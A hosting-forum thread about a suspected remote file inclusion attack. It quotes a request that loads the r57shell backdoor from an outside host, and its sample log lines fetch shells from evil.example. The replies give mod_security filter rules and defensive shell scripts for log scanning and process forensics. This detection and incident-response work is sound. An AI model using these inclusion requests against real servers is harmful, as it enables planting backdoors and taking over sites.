Anyone know what this actually does?

noimad1 (Well-Known Member, Mar 27, 2003)

Does anyone know if this would actually do anything:


www.mydomain.com/randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt

I mean would that actually download any files to my server or anything like that?

I keep getting files in my tmp directory, but I can't find out where they are coming from. I've upgraded all software I am using, and removed any old versions like phpbb2 and such....


This is the only strange one I see in my log?
 

HostMerit (Well-Known Member, Oct 24, 2004, New Jersey, USA; cPanel Access Level: DataCenter Provider)

Use mod_security.

Add:

SecFilter "LOCAL_PATH"
SecFilter "r57shell\.txt"

Common backdoor shell; securing tmp won't help, it can easily be run from perl.
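An added example that is not part of the thread and not mod_security's own code: a shell script that applies the two literal patterns from the SecFilter rules above to Apache combined-format access log lines, next to a check for the general shape of the attack (a query parameter whose value is a URL, plain or URL-encoded) that also reports which script each request hit. The log lines, client addresses, hosts and paths are constructed for the example. The literal rules only catch this one parameter name and this one file name; the broader pattern also catches renamed parameters and renamed shell files, but it flags legitimate requests that carry a URL too (a search form, in the sample), so treat its output as a list of scripts to audit rather than something to block on blindly. SecFilter is mod_security 1.x syntax; 2.x expresses the same thing with SecRule.

```shell
#!/bin/sh
# Added example for this thread, not code from the thread or from mod_security.
# Scans Apache combined-format access log lines for remote file inclusion
# attempts like the one in the original post. secfilter_hits applies the two
# literal patterns from the SecFilter rules; rfi_scan matches the general shape
# of the attack (a query parameter whose value is a URL, plain or URL-encoded)
# and prints which script was targeted, which is the one to audit.

# Constructed sample log lines; client addresses, hosts and paths are invented.
SAMPLE_LOG='10.0.0.5 - - [23/Dec/2005:14:05:22 -0500] "GET /randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [23/Dec/2005:14:05:25 -0500] "GET /forum/index.php?page=http%3A%2F%2Fevil.example%2Fc99.txt%3F HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
10.0.0.9 - - [23/Dec/2005:14:06:01 -0500] "GET /gallery/view.php?img=photos/1.jpg HTTP/1.1" 200 20480 "-" "Mozilla/4.0"
10.0.0.5 - - [23/Dec/2005:14:07:13 -0500] "GET /scripts/page.php?inc=ftp://evil.example/cmd.txt HTTP/1.1" 404 300 "-" "Mozilla/4.0"
10.0.0.12 - - [23/Dec/2005:14:08:40 -0500] "GET /blog/?s=http://www.example.com HTTP/1.1" 200 2048 "-" "Mozilla/4.0"'

count_lines() { awk 'END { print NR }'; }

# What the two SecFilter rules from the post would have matched: the literal
# parameter name and the literal shell file name, nothing else.
secfilter_hits() {
    grep -E 'LOCAL_PATH|r57shell\.txt' || true
}

# Any request whose query string hands a URL to a parameter. Prints
# "client script parameter value", one line per suspicious parameter.
rfi_scan() {
    grep -iE '=(https?|ftp)(://|%3a%2f%2f)' |
    awk '{
        split($7, req, "?")           # $7 is the request path in combined format
        n = split(req[2], kv, "&")    # individual key=value pairs of the query
        for (i = 1; i <= n; i++) {
            if (tolower(kv[i]) ~ /=(https?|ftp)(:\/\/|%3a%2f%2f)/) {
                eq = index(kv[i], "=")
                print $1, req[1], substr(kv[i], 1, eq - 1), substr(kv[i], eq + 1)
            }
        }
    }'
}

# Distinct scripts that received a URL-valued parameter: the candidate
# vulnerable scripts to audit (or false positives to rule out, like a search form).
rfi_targets() {
    rfi_scan | awk '{ print $2 }' | sort -u
}

# Stand-alone run over the constructed sample. Against a live cPanel box the
# input would be: cat /usr/local/apache/domlogs/* | rfi_scan
printf '%s\n' "$SAMPLE_LOG" | rfi_scan
printf '%s\n' "$SAMPLE_LOG" | rfi_targets
```

On the sample, the literal rules match one line; the general pattern matches four, one of which (the blog search) is harmless, which is exactly why the result is a work list and not a block list.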
 

noimad1 (Well-Known Member, Mar 27, 2003)

HostMerit said:
Use mod_security.

Add:

SecFilter "LOCAL_PATH"
SecFilter "r57shell\.txt"

Common backdoor shell; securing tmp won't help, it can easily be run from perl.
I am running mod_security, so I will add those SecFilters. I'm still kind of new to mod_security, so I wasn't sure exactly how that worked. But if it is that easy to add the filters, that is easy enough....

I'll give it a try.

Thanks,
 

noimad1 (Well-Known Member, Mar 27, 2003)

HostMerit said:
I suggest checking out my mod_security configuration; I've written a lot of the rules myself, from scouring error logs, domlogs, recent exploits, etc. It's always updated.

I've also added rules based upon your attack

http://www.hostmerit.com/modsec.user.conf

Please let me know if you have any other questions :D

Thank you very much. I've added the SecFilters and then tried that URL and it said permission denied, so I think that is good.

Now we will see if that is what they were using to get the files in the tmp directory...
 

randomuser2 (Member, Dec 23, 2005)

You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- i.e. stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perseverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
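The check randomuser2 describes, as an added example that is not part of the thread: a shell script that takes the time a file appeared in /tmp (what stat reports) and pulls the web server log lines from the minutes around it. It assumes Apache's combined log format and a GNU or BSD stat; the date arithmetic is done in awk so it does not depend on GNU date. The log lines and the drop time are constructed for the example. One caveat on the "timestamps are trivial to modify" point: touch and the utime calls behind it set atime and mtime but cannot set ctime, which the kernel updates itself, so ctime (stat -c %Z on GNU) is the hardest of the three to fake without also moving the system clock.

```shell
#!/bin/sh
# Added example for this thread, not code from the thread. Implements the
# timestamp correlation described above: take the time a file appeared in /tmp
# and pull the web server log lines from the window around it. Assumes Apache
# combined log format; date math is in awk so GNU date is not required.

# awk program shared by the functions below. With -v ts=... it prints the epoch
# seconds for one log timestamp; otherwise it filters log lines on stdin to
# those within w seconds of epoch t.
LOGTIME_AWK='
function days_from_civil(y, m, d,    era, yoe, doy, doe) {
    # days since 1970-01-01 for a Gregorian date (Hinnant algorithm)
    if (m <= 2) y--
    era = int((y >= 0 ? y : y - 399) / 400)
    yoe = y - era * 400
    doy = int((153 * (m + (m > 2 ? -3 : 9)) + 2) / 5) + d - 1
    doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
    return era * 146097 + doe - 719468
}
function log_epoch(ts,    a, mon, tz, sign, off) {
    # ts looks like 23/Dec/2005:14:05:22 -0500 (local time plus UTC offset)
    split(ts, a, "[/: ]")
    mon = (index("JanFebMarAprMayJunJulAugSepOctNovDec", a[2]) + 2) / 3
    tz = a[7] + 0
    sign = (tz < 0) ? -1 : 1
    if (tz < 0) tz = -tz
    off = sign * (int(tz / 100) * 3600 + (tz % 100) * 60)
    return days_from_civil(a[3] + 0, mon, a[1] + 0) * 86400 + a[4] * 3600 + a[5] * 60 + a[6] - off
}
BEGIN { if (ts != "") { print log_epoch(ts); exit } }
{
    # fields 4 and 5 of a combined-format line are "[day/Mon/year:hh:mm:ss" and "zone]"
    stamp = substr($4, 2) " " substr($5, 1, length($5) - 1)
    diff = log_epoch(stamp) - t
    if (diff < 0) diff = -diff
    if (diff <= w) print
}
'

count_lines() { awk 'END { print NR }'; }

# Epoch seconds for a timestamp copied out of the log.
log_ts_to_epoch() {
    awk -v ts="$1" "$LOGTIME_AWK" /dev/null
}

# Modification time of a file as epoch seconds (GNU stat first, then BSD stat).
file_mtime() {
    stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"
}

# Log lines on stdin whose timestamp is within WINDOW seconds (default 120) of EPOCH.
log_window() {
    awk -v t="$1" -v w="${2:-120}" "$LOGTIME_AWK"
}

# Constructed sample log; the dropped file is assumed to have appeared at
# 14:05:40 -0500 the same day (epoch 1135364740), as stat would report it.
SAMPLE_LOG='10.0.0.9 - - [23/Dec/2005:14:01:10 -0500] "GET /index.php HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
10.0.0.5 - - [23/Dec/2005:14:05:22 -0500] "GET /randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [23/Dec/2005:14:05:40 -0500] "GET /images/logo.gif HTTP/1.1" 200 8120 "-" "Mozilla/4.0"
10.0.0.5 - - [23/Dec/2005:14:22:03 -0500] "POST /randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt HTTP/1.1" 200 4100 "-" "Mozilla/4.0"'
DROP_TIME=1135364740

printf '%s\n' "$SAMPLE_LOG" | log_window "$DROP_TIME" 60
# Live use: cat /usr/local/apache/domlogs/* | log_window "$(file_mtime /tmp/whatever.txt)" 120
```

Start with a narrow window and widen it: the request that fetched the shell is usually seconds before the file appears, and the script in that request line is the one to audit. Run it per domlog rather than over the concatenation when several domains are busy, so the hit is not buried.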
 

noimad1 (Well-Known Member, Mar 27, 2003)

randomuser2 said:
You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- i.e. stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perseverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
Thank you very much for the information. I will monitor the tmp directory and see if it happens again. I was still concerned about having an insecure script out there. This domain is using so many it is hard to find. Maybe doing what you said can help me track it down...
 

noimad1 (Well-Known Member, Mar 27, 2003)

randomuser2 said:
You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- i.e. stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perseverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.

Ok, I got another one. So what logs exactly would you go through first?
 

HostMerit (Well-Known Member, Oct 24, 2004, New Jersey, USA; cPanel Access Level: DataCenter Provider)

Try

grep "filename.txt" /usr/local/apache/domlogs/*

Quick and dirty but might help.

Also, ps -u nobody; look for anything except httpd, and possibly melange/chats running, things like perl, psybnc, etc.

Then take the process ID (pid) and cd /proc/(pid)

Then cat environ and look for PWD (directory) or OLDPWD (last dir); also, while in this dir, ls -al and search for shortcuts back to the user's directory, or wherever it sprouted from.
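The process check from the post above, scripted as an added example that is not code from the thread. It assumes a Linux host with procps ps and /proc, and that Apache runs as nobody (WEB_USER, overridable). The sample ps listing in the block and the environ file in the test are constructed. Beyond the post's cd /proc/pid and cat environ, it also reads /proc/PID/cwd and /proc/PID/exe: cwd is the directory the process is actually running in, and Linux marks the exe link with " (deleted)" when the binary was removed from disk after it started, which dropped tools often are.

```shell
#!/bin/sh
# Added example for this thread, not code from the thread. Scripts the process
# check from the post above on a Linux box with procps and /proc: list processes
# owned by the web server user that are not httpd, and for each show where it
# runs from (cwd), what binary it is (exe), and the PWD/OLDPWD recorded in its
# environment, which often still point at the directory it was launched from.

WEB_USER="${WEB_USER:-nobody}"   # the user Apache runs as on this box (assumption)

count_lines() { awk 'END { print NR }'; }

# Drop httpd from a "pid comm args" listing on stdin; whatever is left is worth a look.
non_httpd() {
    awk '$2 != "httpd"'
}

# PWD and OLDPWD from a NUL-separated environ file such as /proc/PID/environ.
environ_dirs() {
    tr '\0' '\n' < "$1" | grep -E '^(OLD)?PWD=' || true
}

# Linux appends " (deleted)" to the /proc/PID/exe link when the binary was
# unlinked after start, a common trick to hide a dropped tool.
exe_deleted() {
    case "$1" in
        *' (deleted)') return 0 ;;
        *) return 1 ;;
    esac
}

# Walk the live process list and report on every non-httpd process of WEB_USER.
check_procs() {
    ps -u "$WEB_USER" -o pid=,comm=,args= | non_httpd | while read -r pid comm args; do
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
        printf '== pid %s (%s): %s\n' "$pid" "$comm" "$args"
        printf '   cwd: %s\n' "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
        if exe_deleted "$exe"; then
            printf '   exe: %s   <-- binary removed from disk after start\n' "$exe"
        else
            printf '   exe: %s\n' "$exe"
        fi
        if [ -r "/proc/$pid/environ" ]; then
            environ_dirs "/proc/$pid/environ" | sed 's/^/   /'
        fi
    done
}

# Constructed sample listing in the same "pid comm args" layout, to show the filter.
SAMPLE_PS=' 1234 httpd   /usr/local/apache/bin/httpd -DSSL
 1235 httpd   /usr/local/apache/bin/httpd -DSSL
 2201 perl    perl /tmp/.x/bot.pl
 2210 psybnc  ./psybnc'

printf '%s\n' "$SAMPLE_PS" | non_httpd
# On the live box: check_procs
```

The `ps -u USER -o pid=,comm=,args=` form is procps syntax (the `=` suppresses the header so the output pipes cleanly); on the constructed listing only the perl and psybnc processes survive the filter. Reading environ and the cwd/exe links needs to run as root, since /proc only exposes them to the process owner and root.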